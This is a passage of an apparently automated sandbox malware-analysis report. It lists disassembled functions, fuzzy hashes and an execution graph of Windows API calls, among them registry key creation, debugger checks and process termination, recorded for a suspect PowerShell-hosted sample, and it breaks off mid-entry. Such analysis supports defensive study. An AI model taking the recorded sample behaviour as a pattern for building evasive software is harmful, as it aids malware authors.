                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB35CF33 Relevance: .0, Instructions: 42COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6c5273b383d64bbf9df138964639aac6fccaddb818fa68e35667912401cf1668
                                                                                                                  • Instruction ID: 2adc602c500ab64cfed07fcb73546c08bad555d3240ca998597c904c94a37ad2
                                                                                                                  • Opcode Fuzzy Hash: 6c5273b383d64bbf9df138964639aac6fccaddb818fa68e35667912401cf1668
                                                                                                                  • Instruction Fuzzy Hash: DF01B12191EF860BD761DF3C18062957BA0BF02260B0447AAD1BDCB1E7D96C69464741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB357874 Relevance: .0, Instructions: 25COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1ae29eb8d2871178207fd7416c5184e2bbb301bb652d1ff7eb146e5c616aec92
                                                                                                                  • Instruction ID: b0369223463e8359af8e90bca9ee60dfaff3cfbd5f5a8151f440d4fb67fd0f0b
                                                                                                                  • Opcode Fuzzy Hash: 1ae29eb8d2871178207fd7416c5184e2bbb301bb652d1ff7eb146e5c616aec92
                                                                                                                  • Instruction Fuzzy Hash: AFE04F22D1D9964FE3D6AF1C24512A46AD1FB1965074901F7E14CCA2E3ED5C6E8287C1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB1BC4C0 Relevance: .0, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2230233829.00007FF9BB1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb1a0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0c334f4d18f3e9b5577bba07ecd8f87abe658fe8f4cc3b05bed4178d4046521f
                                                                                                                  • Instruction ID: 6fd83ea93d543886fd020b6372b7df20b9a5c74ab015fcea1d65647472d608c3
                                                                                                                  • Opcode Fuzzy Hash: 0c334f4d18f3e9b5577bba07ecd8f87abe658fe8f4cc3b05bed4178d4046521f
                                                                                                                  • Instruction Fuzzy Hash: E5D05E30908E0A4EA7B8EE2FD455B7273E1EF68215700467AD449C26B5DAA5FDC687C0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00007FF9BB829EA3 Relevance: 6.4, Strings: 5, Instructions: 177COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2287935941.00007FF9BB820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB820000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb820000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ^^'1$^^/-$^^3+$^^7)$^^?%
                                                                                                                  • API String ID: 0-2055594521
                                                                                                                  • Opcode ID: 0cb821771fa8e54d97904d004b25073cd4128d60cc53c6941536d8f1552a5ea7
                                                                                                                  • Instruction ID: 7e3bbf4cf9c98bec6f91c1af989cbce48f3a4a86ec6dc80146cc042dede38645
                                                                                                                  • Opcode Fuzzy Hash: 0cb821771fa8e54d97904d004b25073cd4128d60cc53c6941536d8f1552a5ea7
                                                                                                                  • Instruction Fuzzy Hash: 6D51773BC08A1266D615F7B874421E52724DF02738B26C5F7E08E8F093ED297465AEDD
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB82AE12 Relevance: 5.1, Strings: 4, Instructions: 139COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2287935941.00007FF9BB820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB820000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb820000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ^^ )$^^&#$^^(!$^^J
                                                                                                                  • API String ID: 0-2469846320
                                                                                                                  • Opcode ID: e08022ac19ef0c71b5aa99f458e0b6f53b8169ee0c8ca4805a02cffb5facd14f
                                                                                                                  • Instruction ID: c499f366f9cc4296275683608eba2f20da762bde54ca15609ad6de06292a474e
                                                                                                                  • Opcode Fuzzy Hash: e08022ac19ef0c71b5aa99f458e0b6f53b8169ee0c8ca4805a02cffb5facd14f
                                                                                                                  • Instruction Fuzzy Hash: 7941B33B808A2265E501FBB8B4521E937798F06238B26C4F3D0CF4E097ED293455AEDD
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:5.2%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:12.4%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:79
                                                                                                                  execution_graph 95892 11017640 GetTickCount 95899 11017550 95892->95899 95900 11017570 95899->95900 95901 11017626 95899->95901 95902 11017592 CoInitialize _GetRawWMIStringW 95900->95902 95904 11017589 WaitForSingleObject 95900->95904 95931 1115e3e1 95901->95931 95905 11017612 95902->95905 95908 110175c5 95902->95908 95904->95902 95905->95901 95907 11017620 CoUninitialize 95905->95907 95906 11017635 95912 11017470 95906->95912 95907->95901 95908->95905 95909 1101760c 95908->95909 95939 1116010d 79 API calls __isdigit_l 95908->95939 95940 1115ff17 67 API calls __fassign 95909->95940 95913 11017490 95912->95913 95920 11017536 95912->95920 95914 110174a8 CoInitialize _GetRawWMIStringW 95913->95914 95916 1101749f WaitForSingleObject 95913->95916 95917 11017522 95914->95917 95921 110174db 95914->95921 95915 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 95918 11017545 SetEvent GetTickCount 95915->95918 95916->95914 95919 11017530 CoUninitialize 95917->95919 95917->95920 95925 11142790 95918->95925 95919->95920 95920->95915 95921->95917 95922 1101751c 95921->95922 95942 1116010d 79 API calls __isdigit_l 95921->95942 95943 1115ff17 67 API calls __fassign 95922->95943 95926 111427a1 95925->95926 95927 1114279c 95925->95927 95945 11141c90 95926->95945 95944 11141a40 18 API calls std::_Mutex::_Mutex 95927->95944 95932 1115e3e9 95931->95932 95933 1115e3eb IsDebuggerPresent 95931->95933 95932->95906 95941 11173d17 95933->95941 95936 11168379 SetUnhandledExceptionFilter UnhandledExceptionFilter 95937 1116839e GetCurrentProcess TerminateProcess 95936->95937 95938 11168396 __call_reportfault 95936->95938 95937->95906 95938->95937 95939->95908 95940->95905 95941->95936 95942->95921 95943->95917 95944->95926 95948 11141b40 95945->95948 95947 11017687 95949 11141b64 95948->95949 95950 11141b69 95948->95950 95968 11141a40 18 API calls std::_Mutex::_Mutex 95949->95968 95952 11141bd2 95950->95952 95953 11141b72 95950->95953 95954 11141c7e 95952->95954 95955 11141bdf wsprintfA 95952->95955 95960 11141b80 95953->95960 95961 11141ba9 95953->95961 95956 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 95954->95956 95957 11141c02 95955->95957 95958 11141c8a 95956->95958 95957->95957 95959 11141c09 wvsprintfA 95957->95959 95958->95947 95967 11141c24 95959->95967 95964 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 95960->95964 95962 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 95961->95962 95963 11141bce 95962->95963 95963->95947 95965 11141ba5 95964->95965 95965->95947 95966 11141c71 OutputDebugStringA 95966->95954 95967->95966 95967->95967 95968->95950 95969 110303a1 GetNativeSystemInfo 95971 110303ad 95969->95971 95970 110305a7 GetStockObject GetObjectA 95972 110305d6 SetErrorMode SetErrorMode 95970->95972 95974 11030411 95971->95974 95975 1103034d 95971->95975 95984 11030354 95971->95984 95976 1110c4b0 std::_Mutex::_Mutex 265 API calls 95972->95976 95978 1110c4b0 std::_Mutex::_Mutex 265 API calls 95974->95978 96037 1110c4b0 95975->96037 95979 11030612 95976->95979 95980 11030418 95978->95980 96046 11027fb0 95979->96046 96191 110f8090 272 API calls std::_Mutex::_Mutex 95980->96191 95983 1103062c 95985 1110c4b0 std::_Mutex::_Mutex 265 API calls 95983->95985 95984->95970 95986 11030652 95985->95986 95987 11027fb0 268 API calls 95986->95987 95988 1103066b InterlockedExchange 95987->95988 95990 1110c4b0 std::_Mutex::_Mutex 265 API calls 95988->95990 95991 11030693 95990->95991 96049 11089560 95991->96049 95993 110306ab GetACP 96060 1115f7b3 95993->96060 95998 110306dc 96107 1113ef50 95998->96107 96001 1110c4b0 std::_Mutex::_Mutex 265 API calls 96002 11030728 96001->96002 96113 110605c0 96002->96113 96005 110307a0 96132 110cb7c0 96005->96132 96006 1110c4b0 std::_Mutex::_Mutex 265 API calls 96008 1103077a 96006->96008 96192 11060230 96008->96192 96010 1110c4b0 std::_Mutex::_Mutex 265 API calls 96011 110307cd 96010->96011 96139 11121ff0 96011->96139 96205 1115f231 96037->96205 96040 1110c503 _memset 96044 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96040->96044 96041 1110c4d7 wsprintfA 96222 110290c0 265 API calls 2 library calls 96041->96222 96045 1110c51d 96044->96045 96045->95984 96047 11087960 268 API calls 96046->96047 96048 11027fbb _memset 96047->96048 96048->95983 96050 1110c4b0 std::_Mutex::_Mutex 265 API calls 96049->96050 96051 11089597 96050->96051 96052 110895b9 InitializeCriticalSection 96051->96052 96054 1110c4b0 std::_Mutex::_Mutex 265 API calls 96051->96054 96056 1108961a 96052->96056 96055 110895b2 96054->96055 96055->96052 96231 1115e87a 66 API calls std::exception::_Copy_str 96055->96231 96056->95993 96058 110895e9 96232 1115ecd1 RaiseException 96058->96232 96061 1115f7e6 96060->96061 96062 1115f7d1 96060->96062 96061->96062 96064 1115f7ed 96061->96064 96255 111659cf 66 API calls __getptd_noexit 96062->96255 96233 1116baca 102 API calls 11 library calls 96064->96233 96065 1115f7d6 96256 1116a5e4 11 API calls __mbsupr_s_l 96065->96256 96068 1115f813 96069 110306d2 96068->96069 96234 1116b904 96068->96234 96071 11161b76 96069->96071 96072 11161b82 __setmbcp 96071->96072 96073 11161ba3 96072->96073 96074 11161b8c 96072->96074 96281 11167e95 96073->96281 96339 111659cf 66 API calls __getptd_noexit 96074->96339 96077 11161b91 96340 1116a5e4 11 API calls __mbsupr_s_l 96077->96340 96081 11161bb2 96301 1116649e 96081->96301 96084 11161b9c _setlocale __setmbcp 96084->95998 96086 11161bde 96314 11160fe4 96086->96314 96093 11161c0e __expandlocale 96097 1116fdec __lock 66 API calls 96093->96097 96094 11161cbf 96345 1116c924 8 API calls 96094->96345 96096 11161cc5 96346 1116c9bd 66 API calls 4 library calls 96096->96346 96099 11161c34 96097->96099 96341 1116cb08 74 API calls 3 library calls 96099->96341 96101 11161c46 96342 1116c924 8 API calls 96101->96342 96103 11161c4c 96106 11161c6a 96103->96106 96343 1116cb08 74 API calls 3 library calls 96103->96343 96344 11161cb4 LeaveCriticalSection _doexit 96106->96344 96572 1113ee60 96107->96572 96109 1113ee60 IsDBCSLeadByte 96110 1113ef65 96109->96110 96110->96109 96111 11161e79 85 API calls std::_Mutex::_Mutex 96110->96111 96112 11030708 96110->96112 96111->96110 96112->96001 96114 11060230 293 API calls 96113->96114 96115 110605fe 96114->96115 96116 1110c4b0 std::_Mutex::_Mutex 265 API calls 96115->96116 96117 1106062b 96116->96117 96118 11060644 96117->96118 96119 11060230 293 API calls 96117->96119 96120 1110c4b0 std::_Mutex::_Mutex 265 API calls 96118->96120 96119->96118 96121 11060655 96120->96121 96122 11060230 293 API calls 96121->96122 96124 1106066e 96121->96124 96122->96124 96123 11030753 96123->96005 96123->96006 96124->96123 96584 1113e630 96124->96584 96126 11060696 96593 11060590 96126->96593 96133 110cb7c9 96132->96133 96134 110307c6 96132->96134 96776 11140be0 GetSystemMetrics GetSystemMetrics 96133->96776 96134->96010 96136 110cb7d0 std::_Mutex::_Mutex 96136->96134 96137 110cb7de CreateWindowExA 96136->96137 96137->96134 96138 110cb808 SetClassLongA 96137->96138 96138->96134 96140 1110c4b0 std::_Mutex::_Mutex 265 API calls 96139->96140 96141 11122024 96140->96141 96142 11122055 96141->96142 96143 1112203a 96141->96143 96777 11121220 96142->96777 96823 11075410 465 API calls std::_Mutex::_Mutex 96143->96823 96145 1112204a 96145->96142 96191->95984 96193 1110c4b0 std::_Mutex::_Mutex 265 API calls 96192->96193 96194 11060281 96193->96194 96195 11060297 InitializeCriticalSection 96194->96195 97957 1105fd30 266 API calls 3 library calls 96194->97957 96198 110602d7 96195->96198 96199 11060346 96195->96199 97958 1105e3b0 287 API calls 3 library calls 96198->97958 96199->96005 96201 110602f8 RegCreateKeyExA 96202 11060352 RegCreateKeyExA 96201->96202 96203 1106031f RegCreateKeyExA 96201->96203 96202->96199 96204 11060385 RegCreateKeyExA 96202->96204 96203->96199 96203->96202 96204->96199 96206 1115f2ae 96205->96206 96213 1115f23f 96205->96213 96229 11169b88 DecodePointer 96206->96229 96208 1115f2b4 96230 111659cf 66 API calls __getptd_noexit 96208->96230 96211 1115f26d RtlAllocateHeap 96211->96213 96221 1110c4ce 96211->96221 96213->96211 96214 1115f29a 96213->96214 96218 1115f298 96213->96218 96219 1115f24a 96213->96219 96226 11169b88 DecodePointer 96213->96226 96227 111659cf 66 API calls __getptd_noexit 96214->96227 96228 111659cf 66 API calls __getptd_noexit 96218->96228 96219->96213 96223 1116a07d 66 API calls __NMSG_WRITE 96219->96223 96224 11169ece 66 API calls 6 library calls 96219->96224 96225 11169c0d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 96219->96225 96221->96040 96221->96041 96223->96219 96224->96219 96226->96213 96227->96218 96228->96221 96229->96208 96230->96221 96231->96058 96232->96052 96233->96068 96257 11165967 96234->96257 96236 1116b914 96237 1116b936 96236->96237 96238 1116b91f 96236->96238 96240 1116b93a 96237->96240 96245 1116b947 __flsbuf 96237->96245 96267 111659cf 66 API calls __getptd_noexit 96238->96267 96268 111659cf 66 API calls __getptd_noexit 96240->96268 96242 1116b924 96242->96069 96243 1116ba37 96272 1116e8f4 97 API calls 6 library calls 96243->96272 96244 1116b9b7 96246 1116b9ce 96244->96246 96249 1116b9eb 96244->96249 96245->96242 96251 1116b99d 96245->96251 96254 1116b9a8 96245->96254 96269 11175218 66 API calls __mbsupr_s_l 96245->96269 96270 1116e8f4 97 API calls 6 library calls 96246->96270 96249->96242 96271 11171d5e 71 API calls 6 library calls 96249->96271 96251->96254 96264 11173811 96251->96264 96254->96243 96254->96244 96255->96065 96256->96069 96258 11165973 96257->96258 96259 11165988 96257->96259 96273 111659cf 66 API calls __getptd_noexit 96258->96273 96259->96236 96261 11165978 96274 1116a5e4 11 API calls __mbsupr_s_l 96261->96274 96263 11165983 96263->96236 96275 11166459 96264->96275 96267->96242 96268->96242 96269->96251 96270->96242 96271->96242 96272->96242 96273->96261 96274->96263 96277 11166462 96275->96277 96276 1115f231 _malloc 65 API calls 96276->96277 96277->96276 96278 11166498 96277->96278 96279 11166479 Sleep 96277->96279 96278->96254 96280 1116648e 96279->96280 96280->96277 96280->96278 96347 11167e1c GetLastError 96281->96347 96283 11167e9d 96285 11161ba8 96283->96285 96361 11169e8a 66 API calls 3 library calls 96283->96361 96286 1116cb55 96285->96286 96287 1116cb61 __setmbcp 96286->96287 96288 11167e95 __getptd 66 API calls 96287->96288 96289 1116cb66 96288->96289 96290 1116cb94 96289->96290 96291 1116cb78 96289->96291 96292 1116fdec __lock 66 API calls 96290->96292 96293 11167e95 __getptd 66 API calls 96291->96293 96294 1116cb9b 96292->96294 96295 1116cb7d 96293->96295 96374 1116cb08 74 API calls 3 library calls 96294->96374 96299 1116cb8b __setmbcp 96295->96299 96373 11169e8a 66 API calls 3 library calls 96295->96373 96297 1116cbaf 96375 1116cbc2 LeaveCriticalSection _doexit 96297->96375 96299->96081 96304 111664a7 96301->96304 96303 11161bc8 96303->96084 96307 1116fdec 96303->96307 96304->96303 96305 111664c5 Sleep 96304->96305 96376 1116c813 96304->96376 96306 111664da 96305->96306 96306->96303 96306->96304 96308 1116fe14 EnterCriticalSection 96307->96308 96309 1116fe01 96307->96309 96308->96086 96387 1116fd2a 96309->96387 96311 1116fe07 96311->96308 96414 11169e8a 66 API calls 3 library calls 96311->96414 96315 11160fed 96314->96315 96317 11161006 96314->96317 96315->96317 96421 1116c895 8 API calls 96315->96421 96318 11161ca8 96317->96318 96422 1116fd13 LeaveCriticalSection 96318->96422 96320 11161bf5 96321 1116195a 96320->96321 96322 11161983 96321->96322 96323 1116199e 96321->96323 96326 11161620 __setlocale_set_cat 101 API calls 96322->96326 96330 1116198d 96322->96330 96325 11161aef 96323->96325 96334 11161ac8 96323->96334 96335 111619d3 _strpbrk _strncmp _strcspn _strlen 96323->96335 96423 111613ff 96325->96423 96326->96330 96328 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96329 11161b74 96328->96329 96329->96093 96329->96094 96330->96328 96331 11161b04 __expandlocale 96331->96330 96331->96334 96437 11161620 96331->96437 96334->96330 96483 1116129a 70 API calls 6 library calls 96334->96483 96335->96330 96335->96334 96336 11161ae1 96335->96336 96337 11161620 __setlocale_set_cat 101 API calls 96335->96337 96479 11165219 66 API calls __mbsupr_s_l 96335->96479 96480 1116a592 96336->96480 96337->96335 96339->96077 96340->96084 96341->96101 96342->96103 96343->96106 96344->96084 96345->96096 96346->96084 96362 11167cda TlsGetValue 96347->96362 96350 11167e89 SetLastError 96350->96283 96351 1116649e __calloc_crt 62 API calls 96352 11167e47 96351->96352 96352->96350 96353 11167e4f DecodePointer 96352->96353 96354 11167e64 96353->96354 96355 11167e80 96354->96355 96356 11167e68 96354->96356 96366 1115f2c5 96355->96366 96365 11167d68 66 API calls 4 library calls 96356->96365 96359 11167e70 GetCurrentThreadId 96359->96350 96360 11167e86 96360->96350 96363 11167cef DecodePointer TlsSetValue 96362->96363 96364 11167d0a 96362->96364 96363->96364 96364->96350 96364->96351 96365->96359 96367 1115f2d0 HeapFree 96366->96367 96368 1115f2f9 _free 96366->96368 96367->96368 96369 1115f2e5 96367->96369 96368->96360 96372 111659cf 66 API calls __getptd_noexit 96369->96372 96371 1115f2eb GetLastError 96371->96368 96372->96371 96374->96297 96375->96295 96377 1116c81f 96376->96377 96382 1116c83a 96376->96382 96378 1116c82b 96377->96378 96377->96382 96385 111659cf 66 API calls __getptd_noexit 96378->96385 96380 1116c84d RtlAllocateHeap 96380->96382 96384 1116c874 96380->96384 96381 1116c830 96381->96304 96382->96380 96382->96384 96386 11169b88 DecodePointer 96382->96386 96384->96304 96385->96381 96386->96382 96388 1116fd36 __setmbcp 96387->96388 96389 1116fd46 96388->96389 96390 1116fd5e 96388->96390 96415 1116a07d 66 API calls __NMSG_WRITE 96389->96415 96393 11166459 __malloc_crt 65 API calls 96390->96393 96399 1116fd6c __setmbcp 96390->96399 96392 1116fd4b 96416 11169ece 66 API calls 6 library calls 96392->96416 96395 1116fd77 96393->96395 96397 1116fd7e 96395->96397 96398 1116fd8d 96395->96398 96396 1116fd52 96417 11169c0d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 96396->96417 96418 111659cf 66 API calls __getptd_noexit 96397->96418 96402 1116fdec __lock 65 API calls 96398->96402 96399->96311 96404 1116fd94 96402->96404 96405 1116fdc7 96404->96405 96406 1116fd9c InitializeCriticalSectionAndSpinCount 96404->96406 96409 1115f2c5 _free 65 API calls 96405->96409 96407 1116fdb8 96406->96407 96408 1116fdac 96406->96408 96420 1116fde3 LeaveCriticalSection _doexit 96407->96420 96410 1115f2c5 _free 65 API calls 96408->96410 96409->96407 96411 1116fdb2 96410->96411 96419 111659cf 66 API calls __getptd_noexit 96411->96419 96415->96392 96416->96396 96418->96399 96419->96407 96420->96399 96421->96317 96422->96320 96424 11167e95 __getptd 66 API calls 96423->96424 96426 1116143a 96424->96426 96425 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96427 1116161e 96425->96427 96428 111614a0 __expandlocale _memmove _strlen 96426->96428 96431 111614a7 96426->96431 96527 1116857f 96426->96527 96427->96331 96428->96431 96432 1116a592 __invoke_watson 10 API calls 96428->96432 96434 1116857f _strcpy_s 66 API calls 96428->96434 96484 11161110 96428->96484 96491 11170419 96428->96491 96536 1116122f 66 API calls 3 library calls 96428->96536 96537 11165219 66 API calls __mbsupr_s_l 96428->96537 96431->96425 96432->96428 96434->96428 96438 11167e95 __getptd 66 API calls 96437->96438 96439 1116164d 96438->96439 96440 111613ff __expandlocale 96 API calls 96439->96440 96444 11161675 __expandlocale _strlen 96440->96444 96479->96335 96566 1116a469 96480->96566 96483->96330 96486 11161129 _memset 96484->96486 96485 11161135 96485->96428 96486->96485 96487 11161158 _strcspn 96486->96487 96538 11165219 66 API calls __mbsupr_s_l 96486->96538 96487->96485 96489 1116a592 __invoke_watson 10 API calls 96487->96489 96539 11165219 66 API calls __mbsupr_s_l 96487->96539 96489->96487 96492 11167e95 __getptd 66 API calls 96491->96492 96496 11170426 96492->96496 96493 11170433 GetUserDefaultLCID 96520 111704ba 96493->96520 96494 1117045d 96497 111704c5 96494->96497 96499 1117046f 96494->96499 96496->96493 96496->96494 96550 1116fe8c 85 API calls _LangCountryEnumProc@4 96496->96550 96497->96493 96500 111704d0 _strlen 96497->96500 96502 11170483 96499->96502 96504 1117047a 96499->96504 96506 111704d6 EnumSystemLocalesA 96500->96506 96555 111703dd EnumSystemLocalesA _GetPrimaryLen _strlen 96502->96555 96551 11170376 96504->96551 96506->96520 96507 11170481 96507->96520 96514 111705fb 96514->96428 96520->96514 96540 1116feee 96520->96540 96528 11168594 96527->96528 96529 1116858d 96527->96529 96560 111659cf 66 API calls __getptd_noexit 96528->96560 96529->96528 96532 111685b2 96529->96532 96533 111685a3 96532->96533 96562 111659cf 66 API calls __getptd_noexit 96532->96562 96533->96428 96535 11168599 96561 1116a5e4 11 API calls __mbsupr_s_l 96535->96561 96536->96428 96537->96428 96538->96487 96539->96487 96541 1116ff48 GetLocaleInfoW 96540->96541 96545 1116fef8 __expandlocale 96540->96545 96545->96541 96546 1116ff0e __expandlocale 96545->96546 96550->96494 96552 1117037d _GetPrimaryLen _strlen 96551->96552 96555->96507 96560->96535 96561->96533 96562->96535 96567 1116a488 _memset __call_reportfault 96566->96567 96568 1116a4a6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 96567->96568 96569 1116a574 __call_reportfault 96568->96569 96570 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96569->96570 96571 1116a590 GetCurrentProcess TerminateProcess 96570->96571 96571->96330 96574 1113ee76 96572->96574 96573 1113ef33 96573->96110 96574->96573 96579 11080b80 96574->96579 96576 1113ee9b 96577 11080b80 IsDBCSLeadByte 96576->96577 96578 1113eecb _memmove 96577->96578 96578->96110 96580 11080b8c 96579->96580 96582 11080b91 std::_Mutex::_Mutex __mbschr_l 96579->96582 96583 11080aa0 IsDBCSLeadByte 96580->96583 96582->96576 96583->96582 96585 1113e63a 96584->96585 96586 1113e63c 96584->96586 96585->96126 96596 1110c530 96586->96596 96588 1113e662 96589 1113e689 96588->96589 96590 1113e66b _strncpy 96588->96590 96603 110290c0 265 API calls 2 library calls 96589->96603 96590->96126 96605 11060490 96593->96605 96597 1115f231 _malloc 66 API calls 96596->96597 96598 1110c53e 96597->96598 96599 1110c547 96598->96599 96600 1110c55e _memset 96598->96600 96604 110290c0 265 API calls 2 library calls 96599->96604 96600->96588 96616 1105fdb0 96605->96616 96609 11060528 96663 1105fc90 96609->96663 96613 1105fe40 274 API calls 96615 110604ec 96613->96615 96615->96609 96615->96613 96617 1110c4b0 std::_Mutex::_Mutex 265 API calls 96616->96617 96618 1105fdcc 96617->96618 96619 1105fe15 96618->96619 96620 1105fdd3 96618->96620 96675 1115e87a 66 API calls std::exception::_Copy_str 96619->96675 96668 1105d940 96620->96668 96623 1105fe0b 96627 1105fe40 96623->96627 96624 1105fe24 96676 1115ecd1 RaiseException 96624->96676 96626 1105fe39 96628 11060155 96627->96628 96632 1105fe75 96627->96632 96628->96615 96629 11060144 96630 1105d940 68 API calls 96629->96630 96630->96628 96631 1105ffd4 96631->96629 96660 11060062 std::ios_base::_Ios_base_dtor 96631->96660 96677 1105fd00 96631->96677 96632->96631 96634 1105ff21 RegEnumValueA 96632->96634 96635 1105fea9 RegQueryInfoKeyA 96632->96635 96636 1105ffbc 96634->96636 96649 1105ff55 96634->96649 96637 1105fee2 96635->96637 96638 1105fece 96635->96638 96639 1115f2c5 _free 66 API calls 96636->96639 96640 1105ff02 96637->96640 96684 110290c0 265 API calls 2 library calls 96637->96684 96683 110290c0 265 API calls 2 library calls 96638->96683 96645 1115f231 _malloc 66 API calls 96640->96645 96641 11080b80 IsDBCSLeadByte 96641->96649 96648 1105ff8e RegEnumValueA 96648->96636 96648->96649 96649->96641 96649->96648 96661 11060169 std::ios_base::_Ios_base_dtor 96649->96661 96685 11080cc0 96649->96685 96650 110600c0 96650->96660 96698 110290c0 265 API calls 2 library calls 96650->96698 96656 11080b80 IsDBCSLeadByte 96656->96660 96660->96629 96660->96650 96660->96656 96660->96661 96662 11080cc0 86 API calls 96660->96662 96699 111421c0 96660->96699 96661->96615 96662->96660 96664 1105d940 68 API calls 96663->96664 96669 1105d951 LeaveCriticalSection 96668->96669 96670 1105d95b 96668->96670 96669->96670 96671 1105d96f 96670->96671 96672 1115f2c5 _free 66 API calls 96670->96672 96673 1105d9b5 96671->96673 96674 1105d979 EnterCriticalSection 96671->96674 96672->96671 96673->96623 96674->96623 96675->96624 96676->96626 96678 1105fd0e 96677->96678 96679 1105fd28 96677->96679 96702 1105f400 96678->96702 96679->96660 96695 11141390 268 API calls 96679->96695 96686 11080ccd 96685->96686 96687 11080cd2 96685->96687 96757 111413b0 96699->96757 96776->96136 96778 11121281 InitializeCriticalSection 96777->96778 96780 111212ae GetCurrentThreadId 96778->96780 96782 111212e5 96780->96782 96783 111212ec 96780->96783 96867 1110c2f0 InterlockedIncrement 96782->96867 96825 1115c340 InterlockedIncrement 96783->96825 96823->96145 96826 1115c357 CreateCompatibleDC 96825->96826 96827 1115c352 96825->96827 96829 1115c37c SelectPalette SelectPalette 96826->96829 96830 1115c368 96826->96830 96900 1115c290 272 API calls std::_Mutex::_Mutex 96827->96900 96902 1115bf80 265 API calls 96829->96902 96901 110290c0 265 API calls 2 library calls 96830->96901 96834 1115c3a3 96903 1115bf80 265 API calls 96834->96903 96867->96783 96900->96826 96902->96834 97957->96195 97958->96201 97959 111321f0 97960 111321f9 97959->97960 97966 11132228 97959->97966 97967 111416c0 97960->97967 97964 11132207 97965 1105d350 79 API calls 97964->97965 97964->97966 97965->97966 97968 11141440 std::_Mutex::_Mutex 90 API calls 97967->97968 97969 111321fe 97968->97969 97969->97966 97970 1112fd90 97969->97970 97971 1112fdb1 std::_Mutex::_Mutex 97970->97971 97994 1112fed1 97970->97994 97974 1112fdc6 97971->97974 97975 1112fddd 97971->97975 97972 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97973 1112fee5 97972->97973 97973->97964 97977 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97974->97977 97998 11140f70 97975->97998 97979 1112fdd9 97977->97979 97979->97964 97981 1112fe10 97982 1112fe17 97981->97982 97983 1112fe88 97981->97983 98033 110b69b0 97982->98033 97984 11140f70 std::_Mutex::_Mutex 265 API calls 97983->97984 97986 1112fe94 wsprintfA 97984->97986 97988 1113f5d0 std::_Mutex::_Mutex 8 API calls 97986->97988 97987 1112fe22 97989 1112feb4 97987->97989 97990 1112fe2a GetTickCount SHGetFolderPathA GetTickCount 97987->97990 97988->97989 97991 11142790 std::_Mutex::_Mutex 21 API calls 97989->97991 97992 1112fe60 97990->97992 97993 1112fe55 97990->97993 97991->97994 97992->97989 98048 110eb620 9 API calls 97992->98048 97995 11142790 std::_Mutex::_Mutex 21 API calls 97993->97995 97994->97972 97995->97992 97997 1112fe83 97997->97989 97999 